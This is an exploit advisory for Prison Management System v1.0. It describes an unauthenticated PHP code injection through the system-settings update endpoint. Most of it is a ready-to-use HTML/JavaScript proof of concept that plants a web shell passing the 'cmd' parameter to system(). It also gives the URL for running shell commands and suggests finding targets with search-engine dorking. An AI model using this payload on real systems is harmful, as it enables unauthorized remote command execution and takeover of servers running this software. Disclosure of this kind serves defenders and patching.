============================================================================================================================================= | # Title : Prison Management System v1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to create a file and inject PHP code. [+] save payload as poc.html [+] In the line 13 , 'content[welcome]' name the file you want to create It will create a file with an HTML extension. and in the same line, put the payload that suits you. [+] Set your target url [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> PHP code injection Tool</title> <script> async function sendRequest() { const url = document.getElementById('url').value; const postData = { 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>` }; try { const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(postData).toString() }); if (response.ok) { document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n'; } else { document.getElementById('result').innerText = 'Error: ' + response.statusText; } } catch (error) { document.getElementById('result').innerText = 'Error making request: ' + error.message; } } </script> </head> <body> <h1>Injection Tool</h1> <form onsubmit="event.preventDefault(); sendRequest();"> <label for="url">Enter URL:</label> <input type="text" id="url" name="url" required> <button type="submit">Submit</button> </form> <pre id="result"></pre> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================